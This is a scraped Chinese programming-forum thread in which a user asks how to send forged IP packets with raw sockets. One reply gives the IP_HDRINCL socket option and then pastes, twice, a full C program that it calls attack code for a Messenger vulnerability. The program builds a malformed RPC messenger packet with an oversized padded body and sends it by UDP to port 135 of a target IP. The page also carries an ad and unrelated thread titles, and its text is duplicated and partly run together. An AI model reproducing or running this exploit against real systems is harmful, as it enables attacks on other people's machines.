如何发送自己伪造的ip包?为什么我伪造的ip包的部分字段生效,而大部分字段仍自己生成 如何发送自己伪造的ip包?为什么我伪造的ip包的部分字段生效,而大部分字段仍自己生成??我用的是socket ,选择SOCKET_RAW,这样做对吗? 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 自己伪造ip包要设置:bool flag=true;setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)); /*在VC++下编译成功,已加入:#pragma comment( lib, "ws2_32.lib" ) usage: mof.exe ip*/#include <stdio.h>#include <winsock.h>#include <string.h>#include <time.h>#pragma comment( lib, "ws2_32.lib" ) // Packet format found thanks to a bit a sniffingstatic unsigned char packet_header[] ="\x04\x00\x28\x00""\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0""\x4f\xb6\xe6\xfc""\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?"\xff\xff\xff\xff""\xff\xff\xff\xff""\xff\xff\xff\xff""\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x00\x00\xff\xff\xff\xff""\xff\xff\xff\xff" // @74 : fields length"\x00\x00";unsigned char field_header[] ="\xff\xff\xff\xff" // @0 : field length"\x00\x00\x00\x00""\xff\xff\xff\xff"; // @8 : field lengthint main(int argc,char *argv[]){ int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "Just for test";//*** MESSAGE *** WSADATA wsaData; WSAStartup(0x0202, &wsaData); ZeroMemory(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(argv[1]); //target ip address addr.sin_port = htons(135); ZeroMemory(packet, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size);/* for (i = 0; i < packet_size; i++) { if (i && ((i & 1) == 0)) fprintf(stdout, " "); if (i && ((i & 15) == 0)) fprintf(stdout, "\n"); fprintf(stdout, "%02x", packet[i]); } fprintf(stdout, "\n");*/ if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) exit(EXIT_FAILURE); if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) exit(EXIT_FAILURE);/* if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1) exit(EXIT_FAILURE);*/ exit(EXIT_SUCCESS);} 这是一个攻击messenger漏洞的代码.... VC哪个方向最有前途?? 多文档窗口静态拆分出错 vc6中编译程序的问题! 怎么设置程序的图标icon 初学VC++用什么书比较好? sqlserver的sp是不是全都要装?还是只装sp3就行了? strstream ATL组件的连接问题? 大侠救我:DAO打不开access数据库 win32。创建窗口类,注册窗口类,创建窗口,刷新窗口。但是窗口没法显示?! thank you !关于VC调用VB的用法,如何得到VB组件中的Variant,总是过不去,在线等待,来者送分 有做界面特效的高手么?
bool flag=true;
setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag));
usage: mof.exe ip*/#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>#pragma comment( lib, "ws2_32.lib" ) // Packet format found thanks to a bit a sniffing
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field lengthint main(int argc,char *argv[])
{
int i, packet_size, fields_size, s;
unsigned char packet[8192];
struct sockaddr_in addr;
// A few conditions :
// 0 <= strlen(from) + strlen(machine) <= 56
// max fields size 3992
char from[] = "RECCA";
char machine[] = "ZEUS";
char body[4096] = "Just for test";//*** MESSAGE *** WSADATA wsaData; WSAStartup(0x0202, &wsaData); ZeroMemory(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(argv[1]); //target ip address
addr.sin_port = htons(135); ZeroMemory(packet, sizeof(packet));
packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], from);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], machine);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
memset(body, 0x14, sizeof(body));
body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], body);
packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1);
*(unsigned int *)(&packet[40]) = time(NULL);
*(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size);/*
for (i = 0; i < packet_size; i++)
{
if (i && ((i & 1) == 0))
fprintf(stdout, " ");
if (i && ((i & 15) == 0))
fprintf(stdout, "\n");
fprintf(stdout, "%02x", packet[i]);
}
fprintf(stdout, "\n");
*/
if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
exit(EXIT_FAILURE); if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1)
exit(EXIT_FAILURE);
/*
if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
exit(EXIT_FAILURE);
*/ exit(EXIT_SUCCESS);
}